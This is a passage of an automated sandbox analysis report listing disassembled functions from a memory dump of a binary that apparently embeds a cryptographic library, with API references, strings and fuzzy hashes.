Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: 89ff3e7ba94fc837e4ff69883c6f3886de2147896db0841746f69ccfc5b1e610
Instruction ID: fd1def7e7ecb07b47c0907d6041fe8b4d75f605b557f4fc883522c01110bebc7
Opcode Fuzzy Hash: 89ff3e7ba94fc837e4ff69883c6f3886de2147896db0841746f69ccfc5b1e610
Instruction Fuzzy Hash: B41163B2A00128BBCB04DFD5DD40DDFBB7CDF99654B108269F90897641EA749A05C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE45AB9
VariantCopy.OLEAUT32(?,6CEB9C90), ref: 6CE45AC1
VariantClear.OLEAUT32(?), ref: 6CE45AE2
__CxxThrowException@8.LIBCMT ref: 6CE45AEF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 0b722496913373d6c08b79252c0f1a803266b588d2abdf21005dd8f13b524513
Instruction ID: 3e9d62c2d74f5401ae7b966ea9c287b87b160566df458319dcdf44203726142d
Opcode Fuzzy Hash: 0b722496913373d6c08b79252c0f1a803266b588d2abdf21005dd8f13b524513
Instruction Fuzzy Hash: F111E673906268AFCB00DF98D8C49DFBB78EB45618F31826AE824A3700C7745E0487E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE90A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6CE90A86

Part of subcall function 6CE908B2: __fltout2.LIBCMT ref: 6CE908DD

__cftog_l.LIBCMT ref: 6CE90AAC
__cftoe_l.LIBCMT ref: 6CE90ADE

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 54b8e9885a20bc2e6030f98fa4553b5fb31ce2c7c545ab160be031b7c6478fc6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 07117E3200018ABBCF124E84DC11CDE7F32BB1D358BA98516FE2859630C376C6B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CE797F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

Part of subcall function 6CE71200: _memcpy_s.LIBCMT ref: 6CE712DD

Part of subcall function 6CE72080: __CxxThrowException@8.LIBCMT ref: 6CE72183

__CxxThrowException@8.LIBCMT ref: 6CE79BA3

Strings

InvertibleRSAFunction: computational error during private key operation, xrefs: 6CE79B08
hMl, xrefs: 6CE79882

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$_memcpy_s
String ID: InvertibleRSAFunction: computational error during private key operation$hMl
API String ID: 4047871975-2836270542
Opcode ID: 6c7e155e0e275d9c5575d8021120bebb436cbe0cd0c619838e2918589c8a5d51
Instruction ID: 1f619420bba3e5ef0b46f424b27d61578fa9056d396934113ec473eaeba40eab
Opcode Fuzzy Hash: 6c7e155e0e275d9c5575d8021120bebb436cbe0cd0c619838e2918589c8a5d51
Instruction Fuzzy Hash: 62C16D711083849BD334CB64D880BDFB7F9AF99304F64891DE59983B90EB75A509CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE88970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CE88A84
_memmove.LIBCMT ref: 6CE88AA0

Strings

EncodingParameters, xrefs: 6CE88A41

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: e798c3b97844a7f69b71c0a25e0cd6a9b415361be6daf360178420325dbf0dff
Instruction ID: d574324e24ea3c63696e204007d5a3315adc521ff28957828bca716398e44cad
Opcode Fuzzy Hash: e798c3b97844a7f69b71c0a25e0cd6a9b415361be6daf360178420325dbf0dff
Instruction Fuzzy Hash: FC6102B42093419FC304CF69C880A2AFBE9BFC9754F144A1EF59987391D774E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE24175
_memmove.LIBCMT ref: 6CE241C6

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

Strings

string too long, xrefs: 6CE24170

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 9ad541d54b05859fa583849663ed716168e14c44a0917bf00b36c7fa8a5dbcca
Instruction ID: 91c884075581f9f945cecaef05950fa537ad2f5f25aeea51e35c2cebd19ec1e4
Opcode Fuzzy Hash: 9ad541d54b05859fa583849663ed716168e14c44a0917bf00b36c7fa8a5dbcca
Instruction Fuzzy Hash: 1531A4333116105BD3218E9CEC80B5AF7F9EBA6764B300A1FE495C7F80C7659C4497A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45488
__CxxThrowException@8.LIBCMT ref: 6CE4549F

Strings

0Bl, xrefs: 6CE45497

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 8e1c00fb0ca5a527dc9a5e08bff7248d24e1862f6078dafbb8ae7defc7a45cf2
Instruction ID: 0186e9e91d2c25ab7118082a7bc28b78e178250b7b7b5bbafcd4c369f97d3d5b
Opcode Fuzzy Hash: 8e1c00fb0ca5a527dc9a5e08bff7248d24e1862f6078dafbb8ae7defc7a45cf2
Instruction Fuzzy Hash: F3318E716057459FC704CF28D48099ABBF4FF89718F608A2EF4558B790E735EA0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE454B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45581
__CxxThrowException@8.LIBCMT ref: 6CE45598

Strings

0Bl, xrefs: 6CE45590

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 7b931e99d02bc381d271cc8ad7137f881989cceaca2bc3f85f6a5ab4cf6eda7b
Instruction ID: 80ad69c7bf7d20cabb7e09c3453ab9adef8d5d57a6e362be4efd2999b5e92a73
Opcode Fuzzy Hash: 7b931e99d02bc381d271cc8ad7137f881989cceaca2bc3f85f6a5ab4cf6eda7b
Instruction Fuzzy Hash: DC317E715042099FC704CF58D881DAAB7F9FB89314F10866EF4198B790E734EA09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE5C39B

Strings

gfff, xrefs: 6CE5C3A3
gfff, xrefs: 6CE5C3F7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: f69dd96c498304f995b535e67d8f762908a384938f38c69ac8b8f2ccd077c537
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: 9A317071A0020DAFDB14CF98D990EFEB7B9EB84318F54811CE81997784D731BA19CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE218C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE2194F

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

std::exception::exception.LIBCMT ref: 6CE2198E

Part of subcall function 6CE895C1: std::exception::operator=.LIBCMT ref: 6CE895DA

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE24067
Part of subcall function 6CE24010: _memmove.LIBCMT ref: 6CE240C8

Strings

Clone() is not implemented yet., xrefs: 6CE218ED

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: 3f9df68fbf56a011cd065efde1904027cdb874b68b05d1a3903499b5bee1f53d
Instruction ID: a1f7da685aea3618939da76b6ab08ec81ff87f1376397ed907f71fd685d23c85
Opcode Fuzzy Hash: 3f9df68fbf56a011cd065efde1904027cdb874b68b05d1a3903499b5bee1f53d
Instruction Fuzzy Hash: 6B315071805248AFCB14CFD8D841BEEFBB8EB05714F20462EE425A7B90DB749609CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE55560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE55657

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

StringStore: missing InputBuffer argument, xrefs: 6CE555E0
InputBuffer, xrefs: 6CE555BF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: 90947ca4825ae985eb05ee1fcfcffe508d52a5c574f9d67d212577824231c844
Instruction ID: 71a74f537fdc242986eb445b2e1593092acd1c4f8fb43015d38ac119238bd23c
Opcode Fuzzy Hash: 90947ca4825ae985eb05ee1fcfcffe508d52a5c574f9d67d212577824231c844
Instruction Fuzzy Hash: 014138B15083809FC320CF59C490A9BFBF4BB99718F644A2EF5A987790DB75D908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CE21EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE21F36

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

std::exception::exception.LIBCMT ref: 6CE21F6E

Part of subcall function 6CE895C1: std::exception::operator=.LIBCMT ref: 6CE895DA

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE24067
Part of subcall function 6CE24010: _memmove.LIBCMT ref: 6CE240C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6CE21ED4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 592468f020ca1c59a56967381e9b11a8ea3929b8b5ca8fe080ffe1efdd634502
Instruction ID: ca5859c5ac6bd7f91b41249d54ffbec528cf94707d276f7401f6f10bb7f4a291
Opcode Fuzzy Hash: 592468f020ca1c59a56967381e9b11a8ea3929b8b5ca8fe080ffe1efdd634502
Instruction Fuzzy Hash: A3313E71905248EFCB14CFD8D881AEEFBB8EB05714F20466EE425A7B91D7749509CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE33317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE33327

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

std::_Xinvalid_argument.LIBCPMT ref: 6CE3336B

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

Strings

vector<T> too long, xrefs: 6CE33366

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: 0b47e12f9a8ca1e5564c55860213e86ffe5f817d780a5174861c43cbb4c64984
Instruction ID: c15e23297d2d7c899f8271aeddb4c4dc713f9bf5f795090af0d3b5d0a8b59981
Opcode Fuzzy Hash: 0b47e12f9a8ca1e5564c55860213e86ffe5f817d780a5174861c43cbb4c64984
Instruction Fuzzy Hash: FF31E576F002159FCB14DF98D980E9AB7B0EB45718F20463DE9299BB90DB31BE00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4D790 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4D861
__CxxThrowException@8.LIBCMT ref: 6CE4D878

Strings

0Bl, xrefs: 6CE4D870

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 8711c1ecf0679c9c2b8d02ddb33675dc284f429d27ea668e6c8818d70c83204c
Instruction ID: 4ab664df4be852636ff3dd7bc482520466358fda6a306c4495904239f7a48f1c
Opcode Fuzzy Hash: 8711c1ecf0679c9c2b8d02ddb33675dc284f429d27ea668e6c8818d70c83204c
Instruction Fuzzy Hash: 4F3182716093459FC704CF18D8819AAB7F4FF89724F508A6EF469877A0D734EA09CB92

Uniqueness

Uniqueness Score: -1.00%

